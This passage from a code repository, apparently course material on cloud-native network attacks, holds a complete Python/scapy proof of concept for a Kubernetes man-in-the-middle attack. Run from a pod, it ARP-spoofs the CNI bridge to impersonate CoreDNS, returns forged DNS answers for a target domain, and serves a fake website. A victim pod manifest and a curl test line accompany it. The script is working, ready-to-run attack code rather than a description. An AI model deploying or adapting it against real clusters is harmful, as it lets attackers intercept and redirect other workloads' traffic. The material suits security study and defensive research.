echo "[*] Trying to curl http://example.com in victim..."
kubectl exec -it victim curl http://example.com

================================================
FILE: code/0405-云原生网络攻击/k8s_dns_mitm.py
================================================
#!/usr/bin/python3
# issues about scapy with Pycharm:
# https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy
import sys
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process

from scapy.layers.inet import IP, UDP, Ether, ICMP
from scapy.layers.l2 import ARP
from scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1
from scapy.layers.dns import DNS, DNSQR, DNSRR


class S(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        self._set_response()
        self.wfile.write("F4ke Website\n".encode('utf-8'))


class DnsProxy:
    """
    Handles DNS request packets, will forward them to real kube-dns,
    except for targeted domains.
""" def __init__(self, upstream_server, local_server_mac, local_server_ip, self_mac, self_ip, fake_domain, interface): self.upstream_server = upstream_server self.local_server_mac = local_server_mac self.local_server_ip = local_server_ip self.mac = self_mac self.ip = self_ip self.fake_domain = fake_domain self.interface = interface @staticmethod def generate_response(request, ip=None, nx=None): return DNS(id=request[DNS].id, aa=1, # authoritative qr=1, # a response rd=request[DNS].rd, # copy recursion qdcount=request[DNS].qdcount, # copy question count qd=request[DNS].qd, # copy question itself ancount=1 if not nx else 0, # we provide a single answer an=DNSRR( rrname=request[DNS].qd.qname, type='A', ttl=1, rdata=ip) if not nx else None, rcode=0 if not nx else 3 ) @staticmethod def is_local_domain(domain): for tld in (".local.", ".internal."): if domain.decode('ascii').endswith(tld): return True def forward(self, req_pkt, verbose): # first contacting local dns server req_domain = req_pkt[DNSQR].qname def parse_responses(p): return ', '.join( [str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)]) # if local, get response from kube-dns if self.is_local_domain(req_domain): answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0, id=req_pkt[DNS].id, qd=DNSQR(qname=req_domain)), verbose=verbose, timeout=1) resp_pkt = Ether( src=self.local_server_mac) / IP( dst=req_pkt[IP].src, src=self.local_server_ip) / UDP( sport=53, dport=req_pkt[UDP].sport) / DNS() # if timeout, returning NXDOMAIN if answer: resp_pkt[DNS] = answer[DNS] else: resp_pkt[DNS] = self.generate_response(req_pkt, nx=True) sendp(resp_pkt, verbose=verbose) print("[+] {} <- KUBE-DNS response {} - {}".format(resp_pkt[IP].dst, str(req_domain), parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0 else resp_pkt[DNS].rcode)) # else, get with upstream else: answer = sr1(IP(dst=self.upstream_server) / UDP() / DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose) resp_pkt = Ether( src=self.local_server_mac) / 
IP( dst=req_pkt[IP].src, src=self.local_server_ip) / UDP( sport=53, dport=req_pkt[UDP].sport) / DNS() resp_pkt[DNS] = answer[DNS] resp_pkt[DNS].id = req_pkt[DNS].id sendp(resp_pkt, verbose=verbose) print("[+] {} <- UPSTREAM response {} - {}".format(resp_pkt[IP].dst, str(req_domain), parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0 else resp_pkt[DNS].rcode)) def spoof(self, req_pkt): spf_resp = IP(dst=req_pkt[IP].src, src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport, sport=53) / self.generate_response(req_pkt, ip=self.ip) send(spf_resp, verbose=0, iface=self.interface) print("[+] Spoofed response to: {} | {} is at {}".format(spf_resp[IP].dst, str(req_pkt["DNS Question Record"].qname), self.ip)) def handle_queries(self, req_pkt): """ decides whether to spoof or forward the packet """ if req_pkt["DNS Question Record"].qname.startswith(self.fake_domain.encode( 'utf-8')): self.spoof(req_pkt) else: self.forward(req_pkt, verbose=False) def dns_req_filter(self, pkt): return (UDP in pkt and DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0 and pkt[UDP].dport == 53 and pkt[Ether].dst == self.mac and pkt[IP].dst == self.local_server_ip) def start(self): # sniffing and filtering dns queries sent to self sniff( lfilter=self.dns_req_filter, prn=self.handle_queries, iface=self.interface, store=False) def get_self_mac_ip(): return Ether().src, ARP().psrc def get_kube_dns_svc_ip(): with open('/etc/resolv.conf', 'r') as f: return f.readline().strip().split(' ')[1] def get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose): mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src answers, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="{}/24".format(self_ip)), timeout=4, verbose=verbose) for answer in answers: if answer[1].src == mac: return mac, answer[1][ARP].psrc return None, None def get_bridge_mac_ip(verbose): res = srp1(Ether() / IP(dst="8.8.8.8", ttl=1) / ICMP(), verbose=verbose) return 
res[Ether].src, res[IP].src def arp_spoofing(bridge_ip, coredns_pod_ip, bridge_mac, verbose): while True: send(ARP(op=2, pdst=bridge_ip, psrc=coredns_pod_ip, hwdst=bridge_mac), verbose=verbose) def fake_http_server(): server_address = ('', 80) server = HTTPServer(server_address, S) server.serve_forever() def main(verbose): print("Kubernetes MITM Attack PoC") print("[*] Starting HTTP Server at 80...") p1 = Process(target=fake_http_server) p1.start() self_mac, self_ip = get_self_mac_ip() print("[+] Current pod IP: %s, MAC: %s" % (self_ip, self_mac)) kube_dns_svc_ip = get_kube_dns_svc_ip() print("[+] Kubernetes DNS service IP: %s" % kube_dns_svc_ip) coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip( kube_dns_svc_ip, self_ip, verbose=verbose) print("[+] CoreDNS pod IP: %s, MAC: %s" % (coredns_pod_ip, coredns_pod_mac)) bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose) print("[+] CNI bridge IP: %s, MAC: %s" % (bridge_ip, bridge_mac)) print("[*] Starting ARP spoofing...") p2 = Process( target=arp_spoofing, args=( bridge_ip, coredns_pod_ip, bridge_mac, verbose)) p2.start() print("[*] Starting DNS proxy...") # proxy dns query and response dns_proxy = DnsProxy( upstream_server="8.8.8.8", local_server_mac=coredns_pod_mac, local_server_ip=coredns_pod_ip, self_mac=self_mac, self_ip=self_ip, fake_domain=sys.argv[1], interface='eth0') p3 = Process(target=dns_proxy.start) p3.start() while True: time.sleep(1) def usage(): print( "Usage:\n\tpython3 {} target_domain".format( sys.argv[0])) if __name__ == "__main__": if len(sys.argv) != 2: usage() else: main(verbose=False) ================================================ FILE: code/0405-云原生网络攻击/victim.yaml ================================================ # victim pod apiVersion: v1 kind: Pod metadata: name: victim spec: containers: - name: main image: curlimages/curl:latest imagePullPolicy: IfNotPresent # Just spin & wait forever command: [ "/bin/sh", "-c", "--" ] args: [ "while true; do sleep 30; done;" ]